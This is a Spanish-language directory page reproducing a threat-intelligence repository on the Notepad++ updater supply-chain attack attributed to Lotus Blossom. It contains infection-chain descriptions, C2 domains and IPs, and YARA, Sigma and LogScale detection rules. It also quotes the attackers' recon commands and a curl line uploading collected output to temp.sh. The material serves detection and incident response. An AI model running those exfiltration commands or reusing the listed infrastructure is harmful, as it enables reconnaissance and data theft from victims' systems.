Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
notepadpp-supply-chain-iocs — IoCs (indicadores de compromiso) y reglas de detección para el ataque a la cadena de suministro de Notepad++ (CVE-2025-15556) — APT Lotus Blossom, junio–diciembre de 2025. Incluye consultas de Falcon LogScale, reglas YARA/Sigma y mapeo de MITRE ATT&CK. | Kitploit
Herramientas/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
Gestión de Indicadores de Compromiso (IOC)Feeds y Agregadores de AmenazasAnálisis de VulnerabilidadesAnálisis ForenseAnálisis de MalwareInteligencia de AmenazasSeguridad de Cadena de SuministroAprendizaje y EducaciónRespuesta a Incidentes

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

IoCs (indicadores de compromiso) y reglas de detección para el ataque a la cadena de suministro de Notepad++ (CVE-2025-15556) — APT Lotus Blossom, junio–diciembre de 2025. Incluye consultas de Falcon LogScale, reglas YARA/Sigma y mapeo de MITRE ATT&CK.

Ver Repositorio
1hace 6 mesesAún no revisado

Ataque a la cadena de suministro de Notepad++ — Repositorio de IoCs

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | Junio – Diciembre 2025

Last Updated IoC Count License: MIT MITRE ATT&CK


Descripción general

Este repositorio contiene una recopilación completa y consolidada de Indicadores de Compromiso (IoCs) relacionada con el ataque a la cadena de suministro de Notepad++ revelado el 2 de febrero de 2026.

Entre junio y diciembre de 2025, un actor de amenazas patrocinado por el estado chino comprometió la infraestructura de alojamiento de Notepad++, secuestrando el mecanismo de actualización integrado (WinGUp) para entregar selectivamente instaladores troyanizados a usuarios específicos. El ataque explotó la falta de verificación criptográfica en el actualizador (anterior a la v8.8.9), lo que permitió la distribución de backdoors personalizados, Cobalt Strike Beacons y payloads de Metasploit.

Datos clave


Cadenas de infección

Kaspersky GReAT identificó tres cadenas de infección distintas, rotadas aproximadamente cada mes para evadir la detección:

Cadena n.º 1 — Julio/Agosto 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → ProShow.exe (legitimate) → exploit via "load" file
  → Metasploit downloader → Cobalt Strike Beacon
  • Abusa de una vulnerabilidad antigua en el software ProShow en lugar de DLL sideloading
  • Reconocimiento: whoami && tasklist → exfiltrado vía temp.sh
  • Directorio de trabajo: %appdata%\ProShow\

Cadena n.º 2 — Septiembre/Octubre 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → script.exe (Lua interpreter) → alien.ini (compiled Lua)
  → shellcode via EnumWindowStationsW → Metasploit downloader → Cobalt Strike Beacon
  • Utiliza un intérprete Lua legítimo para ejecutar shellcode compilado
  • Reconocimiento ampliado: whoami && tasklist && systeminfo && netstat -ano
  • Directorio de trabajo: %appdata%\Adobe\Scripts\

Cadena n.º 3 — Octubre 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitimate) → log.dll (sideloaded)
  → decrypts "BluetoothService" shellcode → Chrysalis backdoor
  • Técnica clásica de DLL sideloading
  • Sin reconocimiento integrado (a diferencia de las cadenas 1 y 2)
  • Directorio de trabajo: %appdata%\Bluetooth\
  • Cobalt Strike Beacon asociado encontrado en C:\ProgramData\USOShared\
root@kitploit:~
                     ┌─────────────────────────────────────────────────────────┐
                     │              COMPROMISE TIMELINE                        │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Oct 25 │  Nov 25 │Dec 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Chain #1 (ProShow) │████████████████████                                    │
  Chain #2 (Lua)     │                    █████████████████████████████        │
  Chain #3 (DLL SL)  │                              ██████████████            │
  Infra access       │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

Contenido del repositorio

ArchivoDescripción
notepadpp_supply_chain_iocs.csvConjunto de datos completo de IoCs (105 indicadores) con mapeo MITRE ATT&CK

Esquema del CSV


Detección y caza de amenazas

Indicadores prioritarios (empezar aquí)

De comportamiento — independientes de IoC, de mayor valor:

  • gup.exe generando cualquier proceso hijo distinto de un instalador legítimo y firmado de Notepad++
  • gup.exe conectándose a dominios/IPs distintos de notepad-plus-plus.org, github.com, release-assets.githubusercontent.com
  • Creación de directorios: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • Creación de %localappdata%\Temp\ns.tmp\ (entorno de ejecución de NSIS — presente en todas las cadenas)

De red — alta confianza:

  • Resolución DNS de cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com
  • Conexiones a temp.sh (51.91.79.17) — especialmente con subida de archivos mediante curl
  • Solicitudes HTTP con URL de temp.sh incrustadas en el encabezado User-Agent
  • Conexiones salientes a 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210

Comandos de reconocimiento (post-explotación):

root@kitploit:~
cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

Consultas de CrowdStrike Falcon LogScale

De comportamiento: búsqueda de procesos hijos de GUP.exe
root@kitploit:~
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
Búsqueda multi-IoC en eventos de proceso, red y DNS
root@kitploit:~
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
    // Malicious IPs
    RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
        | iocType := "Malicious IP" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
    // Malicious Domains
    DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
        | iocType := "Malicious Domain" | iocValue := DomainName | riskScore := "HIGH";
    // Suspicious filenames
    ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
        | iocType := "Suspicious Filename" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Suspicious DLLs
    ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
        | iocType := "Suspicious DLL" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Chain-specific artifacts
    ImageFileName=/\\(alien\.ini|load)$/i
        | iocType := "Chain Artifact" | iocValue := ImageFileName | riskScore := "HIGH";
    * | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
Detección del instalador NSIS (todas las cadenas)
root@kitploit:~
#event_simpleName=DirectoryCreate event_platform=Win
| FilePath=/\\ns\.tmp$/i
| FilePath=/\\Temp\\ns\.tmp$/i
| groupBy([aid, ComputerName, FilePath, ContextTimeStamp], limit=5000)

Regla YARA (patrón NSIS + reconocimiento)

Regla YARA para el actualizador NSIS malicioso
root@kitploit:~
rule Notepadpp_SupplyChain_MaliciousUpdater {
    meta:
        description = "Detects malicious NSIS installers from Notepad++ supply chain attack"
        author = "Renato Z3r0 ed i miei sorcini"
        date = "2026-02"
        reference = "https://securelist.com/notepad-supply-chain-attack/118708/"
        tlp = "WHITE"
        
    strings:
        $nsis = "Nullsoft.NSIS" ascii
        $recon1 = "whoami" ascii nocase
        $recon2 = "tasklist" ascii nocase
        $recon3 = "systeminfo" ascii nocase
        $recon4 = "netstat -ano" ascii nocase
        $exfil = "temp.sh/upload" ascii nocase
        $curl = "curl" ascii nocase
        $dir1 = "\\ProShow\\" ascii nocase
        $dir2 = "\\Adobe\\Scripts\\" ascii nocase
        $dir3 = "\\Bluetooth\\" ascii nocase
        
    condition:
        uint16(0) == 0x5A4D and
        $nsis and
        (2 of ($recon*) or $exfil or ($curl and 1 of ($recon*))) and
        1 of ($dir*)
}

Reglas Sigma

Sigma: proceso hijo sospechoso de GUP.exe
root@kitploit:~
title: Notepad++ GUP.exe Suspicious Child Process
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects GUP.exe (Notepad++ updater) spawning suspicious child processes indicative of supply chain compromise
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
    - attack.initial_access
    - attack.t1195.002
    - cve.2025.15556
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\gup.exe'
    filter_legitimate:
        Image|endswith:
            - '\npp.Installer.x64.exe'
            - '\npp.Installer.exe'
    condition: selection_parent and not filter_legitimate
falsepositives:
    - Legitimate Notepad++ installers with non-standard naming
level: high
Sigma: comandos de reconocimiento con exfiltración vía temp.sh
root@kitploit:~
title: Reconnaissance Data Exfiltration via temp.sh
id: b2c3d4e5-f6a7-8901-bcde-f12345678901
status: experimental
description: Detects system reconnaissance followed by data upload to temp.sh, as observed in Notepad++ supply chain attack
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
tags:
    - attack.exfiltration
    - attack.t1567
    - attack.discovery
    - attack.t1082
logsource:
    category: process_creation
    product: windows
detection:
    selection_curl:
        CommandLine|contains:
            - 'temp.sh/upload'
            - 'temp.sh'
        Image|endswith: '\curl.exe'
    condition: selection_curl
falsepositives:
    - Legitimate use of temp.sh file sharing service (rare in corporate environments)
level: high
Sigma: resolución de dominios maliciosos
root@kitploit:~
title: Notepad++ Supply Chain C2 Domain Resolution
id: c3d4e5f6-a7b8-9012-cdef-123456789012
status: experimental
description: Detects DNS resolution of C2 domains associated with the Notepad++ supply chain attack
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        QueryName|endswith:
            - 'cdncheck.it.com'
            - 'safe-dns.it.com'
            - 'self-dns.it.com'
            - 'api.skycloudcenter.com'
            - 'api.wiresguard.com'
    condition: selection
falsepositives:
    - Very unlikely in corporate environments
level: critical

Mapeo MITRE ATT&CK


Referencias


Acciones inmediatas

  1. Identificar todos los endpoints con Notepad++ instalado (cualquier versión < 8.9.1)
  2. Buscar procesos hijos inesperados generados por gup.exe entre junio y diciembre de 2025
  3. Revisar los registros de red en busca de conexiones a los dominios e IPs de C2 listados anteriormente
  4. Comprobar los artefactos del sistema de archivos (%appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\)
  5. Actualizar Notepad++ a v8.9.1+ utilizando un instalador descargado manualmente desde los lanzamientos oficiales de GitHub
  6. Eliminar cualquier certificado raíz personalizado antiguo instalado por versiones anteriores de Notepad++
  7. Aislar y realizar triaje de cualquier endpoint que muestre indicadores positivos

Registro de cambios

FechaCambio
2026-02-09Publicación inicial — 105 IoCs consolidados de Kaspersky, Rapid7, CrowdStrike, Tenable

Licencia

Este repositorio se proporciona bajo la Licencia MIT. Los IoCs se agregan a partir de fuentes públicas con fines exclusivamente defensivos.


Contribuciones

Las contribuciones son bienvenidas. Si dispone de IoCs adicionales, reglas de detección o correcciones:

  1. Haga un fork del repositorio
  2. Añada sus indicadores al CSV (manteniendo el esquema)
  3. Envíe una pull request con referencias a la fuente

Aviso: Este repositorio está destinado exclusivamente a fines defensivos de ciberseguridad. Los IoCs y las reglas de detección se proporcionan tal cual para ayudar a las organizaciones a evaluar su exposición a este compromiso de la cadena de suministro.

Descargar herramienta
CVECVE-2025-15556 — Descarga de código sin verificación de integridad
Actor de amenazasLotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
Período de actividadJunio 2025 – 2 de diciembre de 2025
Vector de ataqueCompromiso de la cadena de suministro a través del actualizador automático WinGUp
ObjetivosGobierno, telecomunicaciones, servicios financieros, proveedores de TI (Filipinas, Vietnam, El Salvador, Australia, Asia Oriental)
MalwareBackdoor Chrysalis (personalizado), Cobalt Strike Beacon, Metasploit Meterpreter
Corregido enNotepad++ v8.8.9+ (verificación de certificados) / v8.9.1+ (validación XMLDSig)
ColumnaDescripción
ioc_typeTipo: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueEl valor del indicador
chainCadena de infección (1, 2, 3, 1/2, 2/3, all, n/a)
contextDescripción de lo que representa el IoC
sourceFuente de inteligencia (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskSeveridad (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueID de técnica MITRE ATT&CK
TácticaTécnicaIDUso en esta campaña
Acceso inicialCompromiso de la cadena de suministro: Compromiso de la cadena de suministro de softwareT1195.002Mecanismo de actualización WinGUp secuestrado
EjecuciónIntérprete de comandos y scripts: Shell de comandos de WindowsT1059.003Reconocimiento mediante cmd.exe
EjecuciónIntérprete de comandos y scripts: Python/LuaT1059.006Intérprete Lua de la cadena n.º 2
EjecuciónExplotación para ejecución en el clienteT1203Vulnerabilidad de ProShow de la cadena n.º 1
EjecuciónAPI nativaT1106EnumWindowStationsW para ejecución de shellcode
PersistenciaSecuestro del flujo de ejecución: DLL Side-LoadingT1574.002Sideloading de log.dll en la cadena n.º 3
Evasión de defensasArchivos o información ofuscadosT1027Shellcode cifrado, clave XOR "CRAZY"
Evasión de defensasSuplantación: Coincidencia con nombre legítimoT1036.005BluetoothService.exe, update.exe, AutoUpdater.exe
DescubrimientoDescubrimiento de información del sistemaT1082whoami, systeminfo, tasklist, netstat
RecopilaciónDatos organizados: Preparación de datos localesT1074.001Salida del reconocimiento guardada en archivos .txt
Comando y controlProtocolo de capa de aplicación: Protocolos webT1071.001C2 por HTTPS mediante Cobalt Strike, Chrysalis
Comando y controlCanal cifradoT1573Configuración cifrada del Beacon de CS
Comando y controlTransferencia de herramientas entrantesT1105Descargador de Metasploit que obtiene el Beacon de CS
ExfiltraciónExfiltración a través de servicio webT1567Subida a temp.sh
FuenteEnlace
Kaspersky GReAT — Cadenas de ejecución inadvertidas y nuevos IoCssecurelist.com
Rapid7 — Chrysalis Backdoor: inmersión en el arsenal de Lotus Blossomrapid7.com
Divulgación oficial de Notepad++ — Actualización de información del incidente de secuestronotepad-plus-plus.org
Kevin Beaumont — Divulgación inicial y atribuciónDoublePulsar
Tenable — Preguntas frecuentes sobre el compromiso de la cadena de suministro de Notepad++tenable.com
Orca Security — Análisis del secuestro de actualización y remediaciónorca.security
CSO Online — Sofisticado ataque de APT chino a la cadena de suministrocsoonline.com